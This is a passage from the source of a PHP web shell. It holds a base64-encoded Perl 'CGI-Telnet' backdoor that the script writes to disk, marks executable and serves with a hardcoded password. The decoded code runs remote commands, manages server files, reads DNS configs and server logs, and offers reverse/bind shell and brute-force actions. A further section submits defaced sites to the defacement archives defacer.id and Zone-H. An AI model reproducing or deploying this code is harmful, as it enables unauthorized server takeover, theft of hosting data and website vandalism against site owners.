oc3RhdCgkZmlsZSkpWzQsNV07DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJcmV0dXJuICI/Pz8iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJJG5hbWU9Z2V0cHd1aWQoJHVpZCk7DQoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7DQoJCQlyZXR1cm4gJG5hbWUuIi8iLiRncm91cDsNCgkJfQ0KCX0NCglyZXR1cm4gIj8/PyI7DQp9DQpzdWIgUGFyZW50Rm9sZGVyKCQpDQp7DQoJbXkgJHBhdGggPSBzaGlmdDsNCglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7DQoJY2hvcCgkcGF0aCA9IGAkQ29tbWApOw0KCXJldHVybiAkcGF0aDsNCn0NCnN1YiBGaWxlUGVybXMoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCW15ICR1ciA9ICItIjsNCglteSAkdXcgPSAiLSI7DQoJaWYoLWUgJGZpbGUpDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWlmKC1yICRmaWxlKXsgJHVyID0gInIiOyB9DQoJCQlpZigtdyAkZmlsZSl7ICR1dyA9ICJ3IjsgfQ0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3Ow0KCQl9ZWxzZQ0KCQl7DQoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOw0KCQkJJHJlc3VsdCA9IHNwcmludGYoIiUwNG8iLCAkbW9kZSAmIDA3Nzc3KTsNCgkJCXJldHVybiAkcmVzdWx0Ow0KCQl9DQoJfQ0KCXJldHVybiAiMDAwMCI7DQp9DQpzdWIgRmlsZUxhc3RNb2RpZmllZCgkKQ0Kew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJaWYoLWUgJGZpbGUpDQoJew0KCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07DQoJCSgkZCwkbSwkeSwkaCwkaSkgPSAobG9jYWx0aW1lKCRsYSkpWzMsNCw1LDIsMV07DQoJCSR5ID0gJHkgKyAxOTAwOw0KCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87DQoJCSRsbXRpbWUgPSBzcHJpbnRmKCIlMDJkLyVzLyU0ZCAlMDJkOiUwMmQiLCRkLCRtb250aFskbV0sJHksJGgsJGkpOw0KCQlyZXR1cm4gJGxtdGltZTsNCgl9DQoJcmV0dXJuICI/Pz8iOw0KfQ0Kc3ViIEZpbGVTaXplKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglpZigtZiAkZmlsZSkNCgl7DQoJCXJldHVybiAtcyAiJGZpbGUiOw0KCX0NCglyZXR1cm4gIjAiOw0KfQ0Kc3ViIFBhcnNlRmlsZVNpemUoJCkNCnsNCglteSAkc2l6ZSA9IHNoaWZ0Ow0KCWlmKCRzaXplIDw9IDEwMjQpDQoJew0KCQlyZXR1cm4gJHNpemUuICIgQiI7DQoJfQ0KCWVsc2UNCgl7DQoJCWlmKCRzaXplIDw9IDEwMjQqMTAyNCkgDQoJCXsNCgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7DQoJCQlyZXR1cm4gJHNpemUuIiBLQiI7DQoJCX0NCgkJZWxzZSANCgkJew0KCQkJJHNpemUgPSBzcHJpbnRmKCIlLjJmIiwkc2l6ZSAvIDEwMjQgLyAxMDI0KTsNCgkJCXJldHVybiAkc2l6ZS4iIE1CIjsNCgkJfQ0KCX0NCn0NCnN1YiB0cmltKCQpDQp7DQoJbXkgJHN0cmluZyA9IHNoaWZ0Ow0KCSRzdHJpbmcgPX4gcy9eXHMrLy87DQoJJHN0cmluZyA9fiBzL1xzKyQvLzsNCglyZXR1cm4gJHN0cmluZzsNCn0NCnN1YiBBZGRTbGFzaGVzKCQpDQp7DQoJbXkgJHN0cmluZyA9IHNoaWZ0Ow0KCSRzdHJpbmc9fiBzL1xcL1xcXFwvZzsNCglyZXR1cm4gJHN0cmluZzsNCn0NCnN1YiBUcmltU2xhc2hlcygkKQ0Kew0KCW15ICRzdHJpbmcgPSBzaGlmdDsNCgkkc3RyaW5nPX4gcy9cL1wvL1wvL2c7DQoJJHN0cmluZz1+IHMvXFxcXC9cXC9nOw0KCXJldHVybiAkc3RyaW5nOw0KfQ0Kc3ViIExpc3REaXINCnsNCglteSAkcGF0aCA9ICZUcmltU2xhc2hlcygkQ3VycmVudERpci4kUGF0aFNlcCk7DQoJbXkgJHJlc3VsdCA9ICI8Zm9ybSBuYW1lPSdmJyBvblN1Ym1pdD1cIkVuY29kZXIoJ2QnKVwiIGFjdGlvbj0nJFNjcmlwdExvY2F0aW9uJz48c3BhbiBzdHlsZT0nZm9udDogMTFwdCBWZXJkYW5hOyBmb250LXdlaWdodDogYm9sZDsnPlBhdGg6IFsgIi4mQWRkTGlua0RpcigiZ3VpIikuIiBdIDwvc3Bhbj48aW5wdXQgdHlwZT0ndGV4dCcgaWQ9J2QnIG5hbWU9J2QnIHNpemU9JzQwJyB2YWx1ZT0nJEN1cnJlbnREaXInIC8+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0nYScgdmFsdWU9J2d1aSc+PGlucHV0IGNsYXNzPSdzdWJtaXQnIHR5cGU9J3N1Ym1pdCcgdmFsdWU9J0NoYW5nZSc+PC9mb3JtPiI7DQoJaWYoLWQgJHBhdGgpDQoJew0KCQlteSBAZm5hbWUgPSAoKTsNCgkJbXkgQGRuYW1lID0gKCk7DQoJCWlmKG9wZW5kaXIoRElSLCRwYXRoKSkNCgkJew0KCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpDQoJCQl7DQoJCQkJJGY9JHBhdGguJGZpbGU7DQoJCQkJaWYoLWQgJGYpDQoJCQkJew0KCQkJCQlwdXNoKEBkbmFtZSwkZmlsZSk7DQoJCQkJfQ0KCQkJCWVsc2UNCgkJCQl7DQoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsNCgkJCQl9DQoJCQl9DQoJCQljbG9zZWRpcihESVIpOw0KCQl9DQoJCUBmbmFtZSA9IHNvcnQgeyBsYygkYSkgY21wIGxjKCRiKSB9IEBmbmFtZTsNCgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOw0KCQkkcmVzdWx0IC49ICI8ZGl2Pjx0YWJsZSB3aWR0aD0nOTAlJyBjbGFzcz0nbGlzdGRpcic+DQoJCTx0ciBzdHlsZT0nYmFja2dyb3VuZC1jb2xvcjogIzNlM2UzZSc+PHRoPkZpbGUgTmFtZTwvdGg+DQoJCTx0aCB3aWR0aD0nMTAwJz5GaWxlIFNpemU8L3RoPg0KCQk8dGggd2lkdGg9JzE1MCc+T3duZXI8L3RoPg0KCQk8dGggd2lkdGg9JzEwMCc+UGVybWlzc2lvbjwvdGg+DQoJCTx0aCB3aWR0aD0nMTUwJz5MYXN0IE1vZGlmaWVkPC90aD4NCgkJPHRoIHdpZHRoPScyMzAnPkFjdGlvbjwvdGg+PC90cj4iOw0KCQlteSAkc3R5bGU9Im5vdGxpbmUiOw0KCQlteSAkaT0wOw0KCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpDQoJCXsNCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7DQoJCQkkZCA9ICZ0cmltKCRkKTsNCgkJCSRkaXJuYW1lPSRkOw0KCQkJaWYoJGQgZXEgIi4uIikgDQoJCQl7DQoJCQkJJGQgPSAmUGFyZW50Rm9sZGVyKCRwYXRoKTsNCgkJCX0NCgkJCWVsc2lmKCRkIGVxICIuIikgDQoJCQl7DQoJCQkJbmV4dDsNCgkJCX0NCgkJCWVsc2UgDQoJCQl7DQoJCQkJJGQgPSAkcGF0aC4kZDsNCgkJCX0NCgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIGNsYXNzPSdkaXInPjxhICBocmVmPSc/YT1ndWkmZD0iLiZFbmNvZGVEaXIoJGQpLiInPlsgIi4kZGlybmFtZS4iIF08L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPkRJUjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgaWQ9J0ZpbGVQZXJtc18kaScgb25kYmxjbGljaz1cInJtX2NobW9kX2Zvcm0odGhpcywiLiRpLiIsJyIuJkZpbGVQZXJtcygkZCkuIicsJyIuJGRpcm5hbWUuIicpXCIgPjxzcGFuIG9uY2xpY2s9XCJjaG1vZF9mb3JtKCIuJGkuIiwnIi4kZGlybmFtZS4iJylcIiA+Ii4mRmlsZVBlcm1zKCRkKS4iPC9zcGFuPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZGaWxlTGFzdE1vZGlmaWVkKCRkKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPjxhIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGRpcm5hbWUnLCciLiZBZGRTbGFzaGVzKCZBZGRTbGFzaGVzKCRkKSkuIicpOyByZXR1cm4gZmFsc2U7IFwiPlJlbmFtZTwvYT4gIHwgPGEgb25jbGljaz1cImlmKCFjb25maXJtKCdSZW1vdmUgZGlyOiAkZGlybmFtZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0iLiZFbmNvZGVEaXIoJHBhdGgpLiImcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPC90cj4iOw0KCQkJJGkrKzsNCgkJfQ0KCQlmb3JlYWNoIG15ICRmIChAZm5hbWUpDQoJCXsNCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7DQoJCQkkZmlsZT0kZjsNCgkJCSRmID0gJHBhdGguJGY7DQoJCQlteSAkYWN0aW9uID0gZW5jb2RlX2Jhc2U2NCgiZWRpdCAiLiRmaWxlKTsNCgkJCSR2aWV3ID0gIj9kaXI9Ii4kcGF0aC4iJnZpZXc9Ii4kZjsNCgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIGNsYXNzPSdmaWxlJz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4mRW5jb2RlRGlyKCRwYXRoKS4iJmM9Ii4kYWN0aW9uLiInPiIuJGZpbGUuIjwvYT48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQ+Ii4mUGFyc2VGaWxlU2l6ZSgmRmlsZVNpemUoJGYpKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRmKS4iJywnIi4kZmlsZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oJGksJyRmaWxlJylcIiA+Ii4mRmlsZVBlcm1zKCRmKS4iPC9zcGFuPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZGaWxlTGFzdE1vZGlmaWVkKCRmKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPjxhIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGZpbGUnLCdmJyk7IHJldHVybiBmYWxzZTtcIj5SZW5hbWU8L2E+IHwgPGEgaHJlZj0nP2E9ZG93bmxvYWQmbz1nbyZmPSIuJGYuIic+RG93bmxvYWQ8L2E+IHwgPGEgb25jbGljaz1cImlmKCFjb25maXJtKCdSZW1vdmUgZmlsZTogJGZpbGUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9Ii4mRW5jb2RlRGlyKCRwYXRoKS4iJnJlbW92ZT0kZmlsZSc+UmVtb3ZlPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsNCgkJCSRpKys7DQoJCX0NCgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVHJ5IHRvIFZpZXcgTGlzdCBVc2VyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVmlld0RvbWFpblVzZXINCnsNCglvcGVuIChkMG1haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOw0KCW15IEBjbnpzID0gPGQwbWFpbnM+Ow0KCWNsb3NlIGQwbWFpbnM7DQoJbXkgJHN0eWxlPSJsaW5lIjsNCglteSAkcmVzdWx0PSI8aDM+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTtjb2xvcjogI2ZmOTkwMDsnPkRvbWFpbiArIFVzZXI8L2ZvbnQ+PC9oMz4iOw0KCWlmICgkZXJyKQ0KCXsNCgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7DQoJCXJldHVybiAkcmVzdWx0Ow0KCX1lbHNlDQoJew0KCQkkcmVzdWx0IC49ICc8dGFibGUgaWQ9ImRvbWFpbiI+PHRyPjx0aD5kMG1haW5zPC90aD4gPHRoPlVzZXI8L3RoPjwvdHI+JzsNCgl9DQoJZm9yZWFjaCBteSAkb25lIChAY256cykNCgl7DQoJCWlmKCRvbmUgPX4gbS8uKj96b25lICIoLio/KSIgey8pDQoJCXsJDQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGZpbGVuYW1lPSB0cmltKCIvZXRjL3ZhbGlhc2VzLyIuJDEpOw0KCQkJJG93bmVyID0gZ2V0cHd1aWQoKHN0YXQoJGZpbGVuYW1lKSlbNF0pOw0KCQkJJHJlc3VsdCAuPSAnPHRyIHN0eWxlPSIkc3R5bGUiIHdpZHRoPTUwJT48dGQ+PGEgaHJlZj0iaHR0cDovLycuJDEuJyIgdGFyZ2V0PSJfYmxhbmsiPicuJDEuJzwvYT48L3RkPjx0ZD4gJy4kb3duZXIuJzwvdGQ+PC90cj4nOw0KCQl9DQoJfQ0KCSRyZXN1bHQgLj0gJzwvdGFibGU+JzsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVmlldyBMb2cNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3TG9nDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCWlmKCRXaW5OVCkNCgl7DQoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7DQoJfQ0KCW15ICRyZXN1bHQ9Ijx0YWJsZT48dHI+PHRoPlBhdGggTG9nPC90aD48dGg+U3VibWl0PC90aD48L3RyPiI7DQoJbXkgQHBhdGhsb2c9KAknL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9lcnJvcl9sb2cnLA0KCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycsDQoJCQknL3Vzci9sb2NhbC9hcGFjaGUyL2NvbmYvaHR0cGQuY29uZicsDQoJCQknL3Zhci9sb2cvaHR0cGQvZXJyb3JfbG9nJywNCgkJCScvdmFyL2xvZy9odHRwZC9hY2Nlc3NfbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL2Vycm9yX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9hY2Nlc3NfbG9nJywNCgkJCScvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL3N1cGhwX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9zdGF0c19sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvYWNjZXNzX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9lcnJvcl9sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvbGljZW5zZV9sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvbG9naW5fbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL3N0YXRzX2xvZycsDQoJCQknL3Zhci9jcGFuZWwvY3BhbmVsLmNvbmZpZycsDQoJCQknL3Vzci9sb2NhbC9waHAvbGliL3BocC5pbmknLA0KCQkJJy91c3IvbG9jYWwvcGhwNS9saWIvcGhwLmluaScsDQoJCQknL3Zhci9sb2cvbXlzcWwvbXlzcWwtYmluLmxvZycsDQoJCQknL3Zhci9sb2cvbXlzcWwubG9nJywNCgkJCScvdmFyL2xvZy9teXNxbGRlcnJvci5sb2cnLA0KCQkJJy92YXIvbG9nL215c3FsL215c3FsLmxvZycsDQoJCQknL3Zhci9sb2cvbXlzcWwvbXlzcWwtc2xvdy5sb2cnLA0KCQkJJy92YXIvbXlzcWwubG9nJywNCgkJCScvdmFyL2xpYi9teXNxbC9teS5jbmYnLA0KCQkJJy9ldGMvbXlzcWwvbXkuY25mJywNCgkJCScvZXRjL215LmNuZicsDQoJCQkpOw0KCW15ICRpPTA7DQoJbXkgJHBlcm1zOw0KCW15ICRzbDsNCglmb3JlYWNoIG15ICRsb2cgKEBwYXRobG9nKQ0KCXsNCgkJaWYoLXIgJGxvZykNCgkJew0KCQkJJHBlcm1zPSJPSyI7DQoJCX1lbHNlDQoJCXsNCgkJCSRwZXJtcz0iPGZvbnQgc3R5bGU9J2NvbG9yOiByZWQ7Jz5DYW5jZWw8Zm9udD4iOw0KCQl9DQoJCSRyZXN1bHQgLj08PEVORDsNCgkJPHRyPg0KDQoJCQk8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBvblN1Ym1pdD0iRW5jb2RlcignbG9nJGknKSI+DQoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIGlkPSJsb2ckaSIgbmFtZT0iYyIgdmFsdWU9InRhaWwgLTEwMDAwICRsb2cgfCBncmVwICcvaG9tZSciIHNpemU9JzUwJy8+PC90ZD4NCgkJCTx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+DQoJCQk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCIgLz4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkRW5jb2RlQ3VycmVudERpciIgLz4NCgkJCTwvZm9ybT4NCgkJCTx0ZD4kcGVybXM8L3RkPg0KDQoJCTwvdHI+DQpFTkQNCgkJJGkrKzsNCgl9DQoJJHJlc3VsdCAuPSI8L3RhYmxlPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJlJlYWRQYXJzZTsNCiZHZXRDb29raWVzOw0KDQokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9Ow0KJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9Ow0KJExvZ2luUGFzc3dvcmQgPSAkaW57J3AnfTsNCiRSdW5Db21tYW5kID0gZGVjb2RlX2Jhc2U2NCgkaW57J2MnfSk7DQokVHJhbnNmZXJGaWxlID0gJGlueydmJ307DQokT3B0aW9ucyA9ICRpbnsnbyd9Ow0KJEFjdGlvbiA9ICRpbnsnYSd9Ow0KDQokQWN0aW9uID0gImNvbW1hbmQiIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJlRyaW1TbGFzaGVzKGRlY29kZV9iYXNlNjQodHJpbSgkaW57J2QnfSkpKTsNCiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQ0KJFJ1bkNvbW1hbmQ9ICRXaW5OVD8iZGlyIjoiZGlyIC1saWEiIGlmKCRSdW5Db21tYW5kIGVxICIiKTsNCmNob21wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pIAkJIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQp9ZWxzaWYoJEFjdGlvbiBlcSAiZ3VpIikgIyBHVUkgZGlyZWN0b3J5DQp7DQoJJlByaW50UGFnZUhlYWRlcigiZCIpOw0KCWlmKCEkV2luTlQpDQoJew0KCQkkY2htb2Q9aW50KCRpbnsnY2htb2QnfSk7DQoJCWlmKCRjaG1vZCBuZSAwKQ0KCQl7DQoJCQkkY2htb2Q9aW50KCRpbnsnY2htb2QnfSk7DQoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCQkJaWYoY2htb2QoJGNobW9kLCRmaWxlKSkNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJCQl9ZWxzZQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJCQl9DQoJCX0NCgl9DQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9Ow0KCWlmKCRyZW5hbWUgbmUgIiIpDQoJew0KCQlpZihyZW5hbWUoJFRyYW5zZmVyRmlsZSwkcmVuYW1lKSkNCgkJew0KCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOw0KCQl9ZWxzZQ0KCQl7DQoJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOw0KCQl9DQoJfQ0KCSRyZW1vdmU9JGlueydyZW1vdmUnfTsNCglpZigkcmVtb3ZlIG5lICIiKQ0KCXsNCgkJJHJtID0gJEN1cnJlbnREaXIuJFBhdGhTZXAuJHJlbW92ZTsNCgkJaWYoLWQgJHJtKQ0KCQl7DQoJCQkmUm1EaXIoJHJtKTsNCgkJfWVsc2UNCgkJew0KCQkJaWYodW5saW5rKCRybSkpDQoJCQl7DQoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOw0KCQkJfWVsc2UNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOw0KCQkJfQkJCQ0KCQl9DQoJfQ0KCXByaW50ICZMaXN0RGlyOw0KDQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gcnVuIGEgY29tbWFuZA0Kew0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCglwcmludCAmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpDQoJew0KCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJfWVsc2UNCgl7DQoJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJfQ0KCXByaW50ICZMaXN0RGlyOw0KfWVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpIAkJCQkJIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJcHJpbnQgJlVwbG9hZEZpbGU7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiYmFja2JpbmQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGJhY2sgY29ubmVjdCBvciBiaW5kIHBvcnQNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJjbGllbnRwb3J0Iik7DQoJcHJpbnQgJkJhY2tCaW5kOw0KfWVsc2lmKCRBY3Rpb24gZXEgImJydXRlZm9yY2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIGJydXRlIGZvcmNlDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglwcmludCAmQnJ1dGVGb3JjZXI7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQ0Kew0KCXByaW50ICZEb3dubG9hZEZpbGU7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KCXByaW50ICZWaWV3TG9nOw0KDQp9ZWxzaWYoJEFjdGlvbiBlcSAiZG9tYWluc3VzZXIiKSAJCQkjIHVzZXIgd2FudHMgdG8gdmlldyBsaXN0IHVzZXIvZG9tYWluDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglwcmludCAmVmlld0RvbWFpblVzZXI7DQp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0NCiZQcmludFBhZ2VGb290ZXI7';
2639.  
2640. $file = fopen("cgi4e.izo" ,"w+");
2641. $write = fwrite ($file ,base64_decode($cgi4e));
2642. fclose($file);
2643. chmod("cgi4e.izo",0755);
2644. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>CGI-Telnet Version 1.4 </span><br><font face='Tahoma' color='#007700' size='2pt'>Password : BTM</font><center><br><iframe src=cgi4e/cgi4e.izo width=75% height=60% frameborder=0></iframe>
2645.  
2646. </div></center>";
2647. }
2648. elseif($_GET['do'] == 'defid') {
2649. echo "<center>";
2650. echo "<ul>";
2651. echo "<li> <a href='?dir=$dir&do=defid'>Defacer-ID</a> </li>";
2652. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
2653. echo "</ul>";
2654. echo "</center>";
2655. if($_POST['kutang']) {
2656. $site = explode("\r\n", $_POST['sites']);
2657. $kutang = $_POST['kutang'];
2658. $cawet = $_POST['cawet'];
2659. $sempak = $_POST['sempak'];
2660. echo "Defacer Archive: <a href='https://www.defacer.id/hacker/$cawet.html' target='_blank'>https://www.defacer.id/hacker/$cawet.html</a><br><br>";
2661. if($kutang) {
2662. foreach($site as $sites) {
2663. $zh = $sites;
2664. $form_url = "https://defacer.id/notify";
2665. $data_to_post = array();
2666. $data_to_post['attacker'] = "$cawet";
2667. $data_to_post['team'] = "$sempak";
2668. $data_to_post['poc'] = 'SQL Injection';
2669. $data_to_post['url'] = "$zh";
2670. $curl = curl_init();
2671. curl_setopt($curl,CURLOPT_URL, $form_url);
